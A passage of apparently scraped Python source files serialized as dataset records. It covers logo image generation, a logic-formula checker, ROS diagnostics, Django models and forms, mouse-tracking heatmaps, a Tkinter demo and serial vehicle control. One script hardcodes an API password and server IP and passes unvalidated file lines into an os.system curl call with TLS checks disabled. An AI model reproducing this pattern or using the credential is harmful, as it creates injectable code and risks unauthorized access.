image_height = font_height + offset_y + blank_height * 2\n image = IMG.new('RGBA', (image_width, image_height), BOX_COLOR)\n draw = ImageDraw.Draw(image)\n draw.text((left_blank, blank_height), text, fill=RIGHT_TEXT_COLOR, font=font)\n\n # 圆\n magnify_time = 10\n magnified_radii = radii * magnify_time\n circle = IMG.new('L', (magnified_radii * 2, magnified_radii * 2), 0) # 创建一个黑色背景的画布\n draw = ImageDraw.Draw(circle)\n draw.ellipse((0, 0, magnified_radii * 2, magnified_radii * 2), fill=255) # 画白色圆形\n\n # 画4个角(将整圆分离为4个部分)\n magnified_alpha_width = image_width * magnify_time\n magnified_alpha_height = image_height * magnify_time\n alpha = IMG.new('L', (magnified_alpha_width, magnified_alpha_height), 255)\n alpha.paste(circle.crop((0, 0, magnified_radii, magnified_radii)), (0, 0)) # 左上角\n alpha.paste(circle.crop((magnified_radii, 0, magnified_radii * 2, magnified_radii)),\n (magnified_alpha_width - magnified_radii, 0)) # 右上角\n alpha.paste(circle.crop((magnified_radii, magnified_radii, magnified_radii * 2, magnified_radii * 2)),\n (magnified_alpha_width - magnified_radii, magnified_alpha_height - magnified_radii)) # 右下角\n alpha.paste(circle.crop((0, magnified_radii, magnified_radii, magnified_radii * 2)),\n (0, magnified_alpha_height - magnified_radii)) # 左下角\n alpha = alpha.resize((image_width, image_height), IMG.ANTIALIAS)\n image.putalpha(alpha)\n return image\n\n @staticmethod\n async def combine_img(left_text: str, right_text, font_size: int) -> bytes:\n left_img = await PornhubStyleUtils.create_left_part_img(left_text, font_size)\n right_img = await PornhubStyleUtils.create_right_part_img(right_text, font_size)\n blank = 30\n bg_img_width = left_img.width + right_img.width + blank * 2\n bg_img_height = left_img.height\n bg_img = IMG.new('RGBA', (bg_img_width, bg_img_height), BG_COLOR)\n bg_img.paste(left_img, (blank, 0))\n bg_img.paste(right_img, (blank + left_img.width, int((bg_img_height - right_img.height) / 2)), mask=right_img)\n byte_io = BytesIO()\n bg_img.save(byte_io, format=\"PNG\")\n return byte_io.getvalue()\n\n @staticmethod\n async def make_ph_style_logo(left_text: str, right_text: str) -> MessageChain:\n return MessageChain.create([\n Image.fromUnsafeBytes(await PornhubStyleUtils.combine_img(left_text, right_text, FONT_SIZE))\n ])\n\n\nclass YoutubeStyleUtils:\n BG_COLOR = \"#FFFFFF\"\n BOX_COLOR = \"#FF0000\"\n LEFT_TEXT_COLOR = \"#000000\"\n RIGHT_TEXT_COLOR = \"#FFFFFF\"\n\n @staticmethod\n async def create_left_part_img(text: str, font_size: int):\n font = ImageFont.truetype('./saya/StyleLogoGenerator/ttf/ArialEnUnicodeBold.ttf', font_size)\n font_width, font_height = font.getsize(text)\n offset_y = font.font.getsize(text)[1][1]\n blank_height = font_height * LEFT_PART_VERTICAL_BLANK_MULTIPLY_FONT_HEIGHT\n right_blank = int(font_width / len(text) * LEFT_PART_HORIZONTAL_BLANK_MULTIPLY_FONT_WIDTH)\n img_height = font_height + offset_y + blank_height * 2\n image_width = font_width + right_blank\n image_size = image_width, img_height\n image = IMG.new('RGBA', image_size, YoutubeStyleUtils.BG_COLOR)\n draw = ImageDraw.Draw(image)\n draw.text((0, blank_height), text, fill=YoutubeStyleUtils.LEFT_TEXT_COLOR, font=font)\n return image\n\n @staticmethod\n async def create_right_part_img(text: str, font_size: int):\n radii = RIGHT_PART_RADII\n font = ImageFont.truetype('./saya/StyleLogoGenerator/ttf/ArialEnUnicodeBold.ttf', font_size)\n font_width, font_height = font.getsize(text)\n offset_y = font.font.getsize(text)[1][1]\n blank_height = font_height * RIGHT_PART_VERTICAL_BLANK_MULTIPLY_FONT_HEIGHT\n left_blank = int(font_width / len(text) * RIGHT_PART_HORIZONTAL_BLANK_MULTIPLY_FONT_WIDTH)\n image_width = font_width + 2 * left_blank\n image_height = font_height + offset_y + blank_height * 2\n image = IMG.new('RGBA', (image_width, image_height), YoutubeStyleUtils.BOX_COLOR)\n draw = ImageDraw.Draw(image)\n draw.text((left_blank, blank_height), text, fill=YoutubeStyleUtils.RIGHT_TEXT_COLOR, font=font)\n\n # 圆\n magnify_time = 10\n magnified_radii = radii * magnify_time\n circle = IMG.new('L', (magnified_radii * 2, magnified_radii * 2), 1) # 创建一个黑色背景的画布\n draw = ImageDraw.Draw(circle)\n draw.ellipse((0, 0, magnified_radii * 2, magnified_radii * 2), fill=255) # 画白色圆形\n\n # 画4个角(将整圆分离为4个部分)\n magnified_alpha_width = image_width * magnify_time\n magnified_alpha_height = image_height * magnify_time\n alpha = IMG.new('L', (magnified_alpha_width, magnified_alpha_height), 255)\n alpha.paste(circle.crop((0, 0, magnified_radii, magnified_radii)), (0, 0)) # 左上角\n alpha.paste(circle.crop((magnified_radii, 0, magnified_radii * 2, magnified_radii)),\n (magnified_alpha_width - magnified_radii, 0)) # 右上角\n alpha.paste(circle.crop((magnified_radii, magnified_radii, magnified_radii * 2, magnified_radii * 2)),\n (magnified_alpha_width - magnified_radii, magnified_alpha_height - magnified_radii)) # 右下角\n alpha.paste(circle.crop((0, magnified_radii, magnified_radii, magnified_radii * 2)),\n (0, magnified_alpha_height - magnified_radii)) # 左下角\n alpha = alpha.resize((image_width, image_height), IMG.ANTIALIAS)\n image.putalpha(alpha)\n return image\n\n @staticmethod\n async def combine_img(left_text: str, right_text, font_size: int) -> bytes:\n left_img = await YoutubeStyleUtils.create_left_part_img(left_text, font_size)\n right_img = await YoutubeStyleUtils.create_right_part_img(right_text, font_size)\n blank = 30\n bg_img_width = left_img.width + right_img.width + blank * 2\n bg_img_height = left_img.height\n bg_img = IMG.new('RGBA', (bg_img_width, bg_img_height), YoutubeStyleUtils.BG_COLOR)\n bg_img.paste(left_img, (blank, 0))\n bg_img.paste(right_img, (blank + left_img.width, int((bg_img_height - right_img.height) / 2)), mask=right_img)\n byte_io = BytesIO()\n bg_img.save(byte_io, format=\"PNG\")\n return byte_io.getvalue()\n\n @staticmethod\n async def make_yt_style_logo(left_text: str, right_text: str) -> MessageChain:\n return MessageChain.create([\n Image.fromUnsafeBytes(await YoutubeStyleUtils.combine_img(left_text, right_text, FONT_SIZE))\n ])\n","sub_path":"saya/StyleLogoGenerator/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":23970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"266874412","text":"import string\n\nform = input()\n\nvar = string.ascii_letters\noperators = \"|&\"\nparents_open = \"([{\"\nparents_close = \")]}\"\n\np_o = [0, 0, 0]\np_c = [0, 0, 0]\n\ndef isVar(char):\n if char is None:\n return False\n elif (char in var):\n return True\n else:\n return False\n\ndef isElement(char):\n return isVar(char) or isOperator(char) or isParent(char)\n\ndef isOperator(char):\n if char is None:\n return False\n if (char in operators):\n return True\n else:\n return False\n \ndef checkParents():\n i = 0\n while (i < 3):\n if p_o[i] < p_c[i]: return False\n i = i + 1\n return True\n\ndef checkComp():\n i = 0\n while (i < 3):\n if p_o[i] != p_c[i]: return False\n i = i + 1\n return True\n\ndef whichParent(char):\n i = 0\n while(i < 3):\n if parents_open[i] == char:\n p_o[i] += 1\n elif parents_close[i] == char:\n p_c[i] += 1\n i = i + 1\n return checkParents()\n\ndef isParent(char):\n if char in parents_open:\n return True\n if char in parents_close:\n return True\n else:\n return False\n\ndef checkOperatorNeigberhood(position):\n if isOperator(form[position-1]):\n return False\n if isOperator(form[position+1]):\n return False\n else:\n return True\n\ndef checkVarNeigberhood(position):\n if position-1 < 0 and position+1 >= len(form):\n return True\n if position-1 < 0:\n return not(isVar(form[position+1]))\n if position+1 >= len(form): \n return not(isVar(form[position-1]))\n else: return not(isVar(form[position-1]) or isVar(form[position+1]))\n\ndef check(form):\n correct = True\n i = 0\n while i < len(form) and correct:\n if isVar(form[i]): correct = checkVarNeigberhood(i)\n if isOperator(form[i]): correct = checkOperatorNeigberhood(i)\n if isParent(form[i]): correct = whichParent(form[i])\n if not(isElement(form[i])): correct = False\n i = i + 1\n correct = checkComp()\n return correct\n\nprint(check(form))\n","sub_path":"Lab2/logical.py","file_name":"logical.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"615269255","text":"#!/usr/bin/env python\n\nimport threading\nimport mutex\nimport rospy\nfrom diagnostic_msgs.msg import DiagnosticArray\n\n\nclass ServiceWrapper(object):\n def __init__(self, service_name=None, service_type=None):\n self.name = service_name\n self.type = service_type\n self.client = None\n\n def generate_diagnostics(self):\n resp = self.client.call() # do I need a try catch here?\n status_msg = self.diagnostics_from_response(resp)\n return status_msg\n\n # Every derived class needs to override this\n def diagnostics_from_response(self, response):\n msg = DiagnosticArray()\n return msg\n\n\nclass MonitorManager(object):\n def __init__(self):\n loop_rate_hz = 1\n rate = rospy.Rate(loop_rate_hz)\n\n self._pub_diag = rospy.Publisher(\n 'diagnostics', DiagnosticArray, queue_size=10)\n self._services = []\n self._ser_lock = threading.Lock()\n self._thread = threading.Thread(\n target=self.call_all, args=(rate,))\n self._thread.daemon = True\n\n # wrong service not caught properly\n # ERROR (in case of wrong type): thread.error: release unlocked lock\n def register_service(self, service):\n try:\n rospy.wait_for_service(service.name, timeout=1.0)\n service.client = rospy.ServiceProxy(service.name, service.type)\n self._ser_lock.acquire()\n self._services.append(service)\n print(\"Service '\" + service.name +\n \"' added of type\" + str(service.type))\n except rospy.ServiceException as exc:\n print(\"Service did not process request: \" + str(exc))\n finally:\n self._ser_lock.release()\n\n def call_all(self, rate):\n seq = 1\n while not rospy.is_shutdown():\n diag_msg = DiagnosticArray()\n diag_msg.header.stamp = rospy.get_rostime()\n\n self._ser_lock.acquire()\n for service in self._services:\n status_msg = service.generate_diagnostics()\n diag_msg.status.extend(status_msg)\n\n self._pub_diag.publish(diag_msg)\n self._ser_lock.release()\n seq += 1\n rate.sleep()\n\n def loop(self):\n self._thread.start()\n","sub_path":"src/rosgraph_monitor/monitor_manager.py","file_name":"monitor_manager.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"637188573","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Calendar',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50, verbose_name='name')),\n ('slug', models.SlugField(verbose_name='slug')),\n ],\n options={\n 'ordering': ['name'],\n 'verbose_name': 'calendar',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=100, verbose_name='title')),\n ('start', models.DateTimeField(verbose_name='start')),\n ('end', models.DateTimeField(verbose_name='end')),\n ('comment', models.TextField(null=True)),\n ('calendar', models.ForeignKey(to='Calendar.Calendar')),\n ],\n options={\n 'ordering': ['start', 'end'],\n 'verbose_name': 'event',\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"Calendar/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"406026670","text":"#this script takes as input a file containing a list of uniprot IDs and their respective e-value after bonferroni correction, and uses each of these e-values to \n#compute a confusion matrix, the accuracy, Matthews correlation coefficient, true positive ratio and false positive ratio\n\nimport sys\nfrom math import sqrt\n\noutput_file = open(\"cm_performance_output.txt\", \"a+\")\n#output_file.write(\"e-value\" + \"\\t\"*5 + \"CM\" + \"\\t\"*2 + \"ACC\" + \"\\t\" + \"TPR\" + \"\\t\" + \"FPR\" + \"\\t\" + \"MCC\" + \"\\n\")\n\ntreshold_list = []\nCM_list = []\nACC_list = []\nTPR_list = []\nFPR_list = []\nMCC_list = []\n\n\n#this function is not used in this project, since the e-value tresholds are not decided arbitrarily but are the e-values obtained from hmmsearch\n'''def many_evals(smallest_eval, iterations): #run the confusion_matrix and cm_performance functions for every iteration\n a = float(smallest_eval) #the value chosen as the starting e-value treshold is multiplied by 10**(-1) every cycle\n for i in range(0, int(iterations)):\n eval_treshold = a *(10**(-int(i)))\n eval_list.append(eval_treshold)\n #eval_list.append(eval_treshold**6)\n #eval_list.append(eval_treshold**9)\n cm_performance(confusion_matrix(inputfile, eval_treshold))\n return()'''\n\ndef get_treshold(treshold_input, confusion_input):\n g = open(treshold_input)\n for line in g:\n splitted_line = line.rstrip().split(',')\n treshold_list.append(splitted_line[0])\n cm_performance(confusion_matrix(confusion_input,splitted_line[0]))\n return()\n\ndef confusion_matrix(inputfile, eval_treshold): #generate a confusion matrix from the input file and e-value treshold given\n f = open(inputfile)\n CM = [[],[]] #initialized confusion matrix \n TN = 0 #true negative \n FP = 0 #false positive\n FN = 0 #false negative\n TP = 0 #true positive\n \n #the following cycle verifies if the e-value obtained from the blast alignment is higher or lower than the chosen treshold,\n #and if this corresponds with the assigned class; note: in this case an e-value equal to the treshold is considered a positive result\n for line in f: \n line_list = line.rstrip().split(',')\n if int(line_list[2]) == 0:\n if float(line_list[0]) > float(eval_treshold):\n TN += 1\n else: \n FP += 1\n #print(line_list[1])\n elif int(line_list[2]) == 1:\n if float(line_list[0]) <= float(eval_treshold):\n TP += 1\n else:\n FN += 1\n\n CM[0].append(TP)\n CM[0].append(FP)\n CM[1].append(FN)\n CM[1].append(TN)\n CM_list.append(CM)\n #print(\"CM = \" + str(CM))\n return(CM)\n \n\n\ndef cm_performance(CM): #calculate the performance of the model\n \n TP = CM[0][0] \n FP = CM[0][1]\n FN = CM[1][0]\n TN = CM[1][1] \n \n ACC = (TP+TN)/(TP+FN+TN+FP)\n ACC_list.append(\"%.3f\" %ACC) #accuracy\n \n\n k = (TP + FN)\n if k == 0: #to avoid having 0 as a denominator\n TPR = 0\n else: \n TPR = (TP)/(TP+FN)\n TPR_list.append(\"%.3f\" %TPR) #true positive rate\n\n j = (FP + TN)\n if j == 0: #to avoid having 0 as a denominator\n FPR = 0\n else:\n FPR = (FP)/(FP+TN) #false positive ratio\n FPR_list.append(\"%.3f\" %FPR)\n\n MCC_DENOM = sqrt((TP+FP)*(TP+FN)*(TN+FP)*(TN+FN))\n if MCC_DENOM == 0: #to avoid having 0 as a denominator\n MCC_DENOM += 1\n MCC = ((TP*TN)-(FP*FN))/MCC_DENOM #matthews correlation coefficient\n MCC_list.append(\"%.3f\" %MCC)\n return()\n\n\n\nif __name__ == \"__main__\":\n treshold_input = sys.argv[1]\n confusion_input = sys.argv[2]\n #eval_treshold = sys.argv[2]\n #smallest_eval = sys.argv[2]\n #iterations = sys.argv[3]\n #many_evals(smallest_eval, iterations)\n get_treshold(treshold_input, confusion_input)\n for i in range(len(treshold_list)):\n output_file.write(str(treshold_list[i]) + \";\" + str(CM_list[i]) + \";\" + str(ACC_list[i]) + \";\" + str(TPR_list[i]) + \";\" + str(FPR_list[i]) + \";\" + str(MCC_list[i]) + \"\\n\")","sub_path":"second_semester/project/scripts/performance_and_conf_matrix.py","file_name":"performance_and_conf_matrix.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"18711247","text":"import matplotlib\n\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport seaborn as sns\nimport config as conf\n\n\n# from keras import backend as K\n\n\ndef grayscale_to_rgb(img):\n return np.stack((img,) * 3, axis=-1)\n\n\nclass mouseHandler:\n max_x = 1279.0\n max_y = 1023.0\n\n def __init__(self, matcherId, M=None):\n self.matcherId = matcherId\n if not M:\n self.mouseData = {}\n self.newMouseData = []\n self.dir = conf.dir\n self.processMouseData()\n self.list2dict()\n else:\n self.mouseData = {}\n self.newMouseData = M\n self.list2dict()\n\n def processMouseData(self):\n last_line = None\n try:\n # with open(str(self.dir + 'ExperimentData/' + self.matcherId + '/Excel - CIDX/2.rms')) as f:\n with open(str(self.dir + 'ExperimentData/' + self.matcherId + '/Excel - CIDX/exam.rms')) as f:\n for line in f.readlines():\n line.replace('{', '').replace('}', '').split()\n action, value = line.replace('{', '').replace('}', '').split()[:2]\n if last_line:\n delay = last_line.replace('}', '').split()[1]\n if not '.' in delay:\n delay = 0.0\n else:\n delay = ''\n # if action not in self.mouseData:\n # self.mouseData[action] = list()\n if action == 'Move':\n p1, p2 = value.replace('(', '').replace(')', '').split(',')[:2]\n # self.mouseData[action] += [tuple((tuple((float(p1), float(p2))), delay)), ]\n self.newMouseData += [tuple((action, tuple((float(p1), float(p2))), delay)), ]\n elif 'Mouse' in action:\n add = line.replace('{', '').replace('}', '').split()[1:3]\n if 'down' in add:\n p1, p2 = add[1].replace('(', '').replace(')', '').split(',')[:2]\n # self.mouseData[action] += [tuple((tuple((float(p1), float(p2))), delay)), ]\n self.newMouseData += [tuple((action, tuple((float(p1), float(p2))), delay)), ]\n elif 'Delay' in action:\n # self.mouseData[action] += [value, ]\n if isinstance(delay, str):\n delay = 0.0\n self.newMouseData += [tuple((action, None, delay)), ]\n else:\n # self.mouseData[action] += [value, ]\n self.newMouseData += [tuple((action, value, delay)), ]\n last_line = line\n except:\n print('couldnt find data for' + self.matcherId)\n\n def list2dict(self):\n for a in self.newMouseData:\n action = a[0]\n if action not in self.mouseData:\n self.mouseData[action] = list()\n self.mouseData[action] += [tuple(a[1:]), ]\n\n def exportMouseData(self, method, save_heatmaps=False):\n # USE THE LIST!!\n x = []\n y = []\n weights = []\n if method not in self.mouseData:\n return np.zeros((37, 45, 3))\n for k in self.mouseData[method]:\n try:\n d = float(k[1])\n except:\n continue\n i, j = k[0]\n x += [float(i), ]\n y += [float(j), ]\n weights += [d, ]\n if len(x) == 0 or len(y) == 0:\n return\n xedges = list(range(0, int(mouseHandler.max_x) + 100, 30))\n yedges = list(range(0, int(mouseHandler.max_y) + 100, 30))\n # heatmap, _, _ = np.histogram2d(x, y, bins=(xedges, yedges), weights=weights)\n heatmap, _, _ = np.histogram2d(x, y, bins=(xedges, yedges))\n heatmap = heatmap.T\n if save_heatmaps:\n plt.clf()\n map_img = plt.imread(self.dir + 'screen.jpg')\n hmax = sns.heatmap(heatmap,\n cmap='Reds',\n alpha=0.5, # whole heatmap is translucent\n zorder=2,\n cbar=False\n )\n hmax.imshow(map_img,\n aspect=hmax.get_aspect(),\n extent=hmax.get_xlim() + hmax.get_ylim(),\n zorder=1) # put the map under the heatmap\n plt.axis('off')\n if not os.path.exists('./figs/' + method):\n os.makedirs('./figs/' + method)\n plt.savefig('./figs/' + method + '/' + self.matcherId + '.jpg', bbox_inches='tight', format='jpg', dpi=300)\n return grayscale_to_rgb(heatmap)\n\n def split2ns(self, matchers):\n M_list = self.newMouseData\n M_dict = self.mouseData\n sub_matchers_size = len(matchers)\n bucket_size = int(len(self.newMouseData) / sub_matchers_size)\n submouses = {}\n last = 0\n for i, m in enumerate(matchers):\n submouse = M_list[last: (i + 1) * bucket_size]\n last = (i + 1) * bucket_size\n submouses[m] = mouseHandler(m, submouse)\n return submouses\n\n def extract_mouse_features(self):\n total_length = float(len(self.newMouseData))\n total_actions = float(len(self.mouseData.keys()))\n min_x, min_y, max_x, max_y, sum_x, count_pos, sum_y, \\\n total_time, total_dist, max_speed = [0.0, ] * 10\n i = 0\n while i < len(self.newMouseData):\n currElapsedTime = 0.0\n if self.newMouseData[i][0] == 'Delay':\n currElapsedTime += float(self.newMouseData[i][2])\n i += 1\n if i >= len(self.newMouseData): break\n while not isinstance(self.newMouseData[i][1], tuple):\n currElapsedTime += float(self.newMouseData[i][2])\n i += 1\n if i >= len(self.newMouseData): break\n currElapsedTime += float(self.newMouseData[i][2])\n j = i + 1\n if j >= len(self.newMouseData): break\n if self.newMouseData[j][0] == 'Delay':\n j += 1\n if j >= len(self.newMouseData): break\n while not isinstance(self.newMouseData[j][1], tuple):\n currElapsedTime += float(self.newMouseData[j][2])\n j += 1\n if j >= len(self.newMouseData): break\n if j >= len(self.newMouseData): break\n # print(self.newMouseData[i], self.newMouseData[j])\n currElapsedTime += float(self.newMouseData[j][2])\n currDist = dist(self.newMouseData[i][1], self.newMouseData[j][1])\n currElapsedTime = currElapsedTime * 60\n total_time += currElapsedTime\n total_dist += dist(self.newMouseData[i][1], self.newMouseData[j][1])\n if currElapsedTime > 0.0:\n if currDist / currElapsedTime > max_speed:\n max_speed = currDist / currElapsedTime\n x_i, y_i = self.newMouseData[i][1]\n sum_x += x_i\n sum_y += y_i\n count_pos += 1\n if x_i < min_x:\n min_x = x_i\n if x_i > max_x:\n max_x = x_i\n if y_i < min_y:\n min_y = y_i\n if y_i > max_y:\n max_y = y_i\n i = j\n avg_speed = 0.0\n if total_time > 0.0:\n avg_speed = total_dist / total_time\n avg_x = 0.0\n avg_x = sum_x / count_pos\n avg_y = sum_y / count_pos\n return total_length, total_actions, total_time, total_dist, \\\n max_speed, min_x, min_y, max_x, max_y, avg_speed, avg_x, avg_y\n\n\ndef dist(a, b):\n return np.linalg.norm(np.array(a) - np.array(b))\n","sub_path":"mouseHandler.py","file_name":"mouseHandler.py","file_ext":"py","file_size_in_byte":7909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"379356323","text":"import os as my_os\nimport simplejson\n#Setting the server address and port\nserver_ip=\"204.16.245.251\"\nport_number=8890\n\nprint(\"The ip is {0} and port is {1}\".format(server_ip,port_number))\n\n#Setting file to read from\nmy_file=open(\"non_string_links2.txt\",\"r\")\n\nlines =my_file.readlines()\nprint(lines)\nfor line in lines: \n my_os.system(\"curl -k -u api:87+frP244 -X GET \\https://{0}:{1}{2} >> out.txt\".format(server_ip,port_number,line[4:]))\nmy_file.close()\n","sub_path":"linux_files/my_script_2.py","file_name":"my_script_2.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653448660","text":"# 통신 프로그램\n# 제어에서 받은 정보로 통신 패킷 만들어서 플랫폼으로 보내기\n# 플랫폼에서 통신 패킷 받아와서 제어로 보내기\n# 패킷 세부 형식(byte array)은 책자 참조\n# input: (from car_control)\n# output: (to car_control)\n\nimport serial\nimport time\nimport math\nimport threading # for test, main 코드에서는 멀티 프로세싱 사용하는 게 목표야.\n\n# CONSTANTS for _read(), related with encoder\nDISTANCE_PER_ROTATION = 54.02 * math.pi # Distance per Rotation [cm]\nPULSE_PER_ROTATION = 100. # Pulse per Rotation\nDISTANCE_PER_PULSE = DISTANCE_PER_ROTATION / PULSE_PER_ROTATION # Distance per Pulse\n\n\nclass PlatformSerial:\n def __init__(self, platform_port):\n self.platform = platform_port # e.g. /dev/ttyUSB0 on GNU/Linux or COM3 on Windows.\n\n # 포트 오픈, 115200 사용. OS 내에서 시리얼 포트도 맞춰줄 것\n try:\n self.ser = serial.Serial(self.platform, 115200) # Baud rate such as 9600 or 115200 etc.\n except Exception as e:\n print(e)\n\n self.reading_data = bytearray([0 for i in range(14)])\n # 쓰기 데이터 셋\n self.writing_data = bytearray.fromhex(\"5354580000000000000001000D0A\")\n self.speed_for_write = 0\n self.steer_for_write = 0\n self.brake_for_write = 0\n self.check = 0\n self.present_time = 0\n self.past_time = 0\n\n self.ct1 = 0\n self.ct2 = 0\n self.sit = 0\n\n def _read(self): # read data from platform\n reading_data = bytearray(self.ser.readline()) # byte array 로 읽어옴\n self.reading_data = reading_data\n try:\n # data parsing, 패킷 설명은 책자 참조\n ETX1 = reading_data[17]\n AorM = reading_data[3]\n ESTOP = reading_data[4]\n GEAR = reading_data[5]\n SPEED = reading_data[6] + reading_data[7] * 256\n STEER = reading_data[8] + reading_data[9] * 256\n\n # STEER 범위 조정\n if STEER >= 32768: # 65536 / 2 = 32768\n STEER = 65536 - STEER\n else:\n STEER = -STEER\n\n BRAKE = reading_data[10]\n time_encoder = time.time()\n\n # ENC0, ENC1, ENC2, ENC3\n ENC = reading_data[11] + reading_data[12] * 256 + reading_data[13] * 65536 + reading_data[14] * 16777216\n if ENC >= 2147483648:\n ENC = ENC - 4294967296\n\n ALIVE = reading_data[15]\n\n try:\n speed_from_encoder = (ENC - self.ENC1[0]) * DISTANCE_PER_PULSE / (time_encoder - self.ENC1[1]) * 0.036\n print('STEER = ', STEER, ' SPEED_ENC = ', speed_from_encoder)\n except Exception as e:\n print(e)\n pass\n\n self.ENC_with_time = (ENC, time_encoder)\n\n except:\n pass\n\n def _write(self, speed_for_write=0, steer_for_write=0, brake_for_write=0): # write data to platform\n dummy_data = bytearray([0 for i in range(14)])\n if not speed_for_write == 0:\n self.speed_for_write = speed_for_write\n if not steer_for_write == 0:\n self.steer_for_write = steer_for_write\n if not brake_for_write == 0:\n self.brake_for_write = brake_for_write\n\n try:\n self.steer_for_write = int(self.steer_for_write * 1.015)\n\n if self.steer_for_write < 0:\n self.steer_for_write = self.steer_for_write + 65536\n\n print(\"steer_for_write = \", self.steer_for_write, \"/ speed_for_write = \", self.speed_for_write,\n \"/ BRAKE = \",\n self.brake_for_write)\n\n # speed 입력\n dummy_data[6] = 0\n dummy_data[7] = self.speed_for_write\n\n # steer 입력, 16진법 두 칸 전송\n dummy_data[8] = int(self.steer_for_write / 256)\n dummy_data[9] = self.steer_for_write % 256\n\n self.writing_data[3] = 1 # AorM\n self.writing_data[4] = 0 # E stop\n self.writing_data[5] = 0 # GEAR\n\n # 임시 데이터를 최종 데이터에 입력\n self.writing_data[6] = dummy_data[6]\n self.writing_data[7] = dummy_data[7]\n self.writing_data[8] = dummy_data[8]\n self.writing_data[9] = dummy_data[9]\n self.writing_data[10] = self.brake_for_write\n\n # 받은 데이터와 똑같이 전송, 플랫폼 자체적으로 데이터 수신 간격을 알기 위함\n self.writing_data[11] = self.reading_data[15]\n self.writing_data[12] = self.reading_data[16]\n self.writing_data[13] = self.reading_data[17]\n\n self.ser.write(bytearray(self.writing_data))\n\n except Exception as e:\n print(e)\n print(' auto error')\n self.ser.write(bytearray(self.writing_data))\n pass\n\n def get_data_real_time(self):\n # _read() 를 이용해 플랫폼 데이터를 실시간으로 읽음\n try:\n while True:\n self._read()\n except KeyboardInterrupt: # ctrl+C 누르면 탈출 - 안 되는데?\n pass\n self.ser.close()\n\n def test_write_to_platform(self):\n\n self.speed_for_write = 0\n self.steer_for_write = 0\n self.brake_for_write = 0\n\n if self.sit == 0:\n self.steer_for_write = 0\n self.speed_for_write = 36\n\n if self.ct1 == 0:\n self.ct1 = self.ENC1[0]\n self.ct2 = self.ENC1[0]\n\n if (self.ct2 - self.ct1) < 100:\n self.steer_for_write = 0\n self.speed_for_write = 36\n\n elif 100 <= (self.ct2 - self.ct1) < 325:\n self.steer_for_write = -1970\n self.speed_for_write = 36\n\n elif 325 <= (self.ct2 - self.ct1) < 425:\n self.steer_for_write = 0\n self.speed_for_write = 36\n\n else:\n self.steer_for_write = 0\n self.speed_for_write = 0\n\n print(self.ct1)\n print(\"****\")\n print(self.ct2)\n print(\"****\")\n print(self.ENC1[0])\n print(\"****\")\n print(self.ENC1[1])\n print(\"****\")\n\n\n def test_communication_main(self):\n read_thread = threading.Thread(target=self._read())\n write_thread = threading.Thread(target=self._write())\n test_write_thread = threading.Thread(target=self.test_write_to_platform())\n\n read_thread.start()\n write_thread.start()\n test_write_thread.start()\n\n\nif __name__ == '__main__':\n port = 'COM7'\n # e.g. /dev/ttyUSB0 on GNU/Linux or COM3 on Windows.\n platform = PlatformSerial(port)\n print('CONNECTED')\n\n while True:\n platform.test_communication_main()\n","sub_path":"rsc/CarControl/test_code_control.py","file_name":"test_code_control.py","file_ext":"py","file_size_in_byte":6874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"466122667","text":"#!python3\nimport os\nimport tkinter as tk\n\n\nclass SampleTkApp(tk.Frame):\n \"\"\"Simple TK GUI application coded to practive GUI-development\n\n Practise well :) ...\n \"\"\"\n\n def __init__(self, master):\n tk.Frame.__init__(self, master)\n self.master = master\n self.pack()\n self.master.title(\"hello World... from TK\")\n\n dialog_frm = tk.Frame(self)\n dialog_frm.pack(padx=20, pady=15)\n tk.Label(dialog_frm, text=\"This is label-frame Tk App..\").pack()\n\n button_frm = tk.Frame(self)\n button_frm.pack(padx=15, pady=(0, 15))\n\n tk.Button(\n button_frm, text=\"Ok\", default='active',\n command=lambda: self.click_command('Ok')\n ).pack(side='right')\n\n tk.Button(\n button_frm, text=\"Cancel\", default='active',\n command=lambda: self.click_command('Cancel')\n ).pack(side='right')\n\n self.entry = tk.StringVar()\n tk.Entry(self, text=\"Hello All...\", textvariable=self.entry).pack()\n\n def click_command(self, name):\n \"\"\"Command to run when Buttons are pressed in a frame\n \"\"\"\n print(f'{self.entry.get()} clicked {name}')\n if(name.lower() == 'cancel'):\n self.master.destroy()\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n app = SampleTkApp(root)\n print(f'starting the app... please close it once done with working...')\n app.mainloop()\n","sub_path":"SampleTkApp.py","file_name":"SampleTkApp.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"329440077","text":"from django import forms\n\nclass ContactForm(forms.Form):\n\n def __init__(self, *args, **kwargs):\n super(ContactForm, self).__init__(*args, **kwargs)\n CHOICES3 = (('1','First'),('2','Second'),)\n self.fields['field1'] = forms.CharField(label='Field Text', max_length=64)\n self.fields['field2'] = forms.CharField(label='Field Long Text', max_length=240, widget=forms.Textarea)\n self.fields['field3'] = 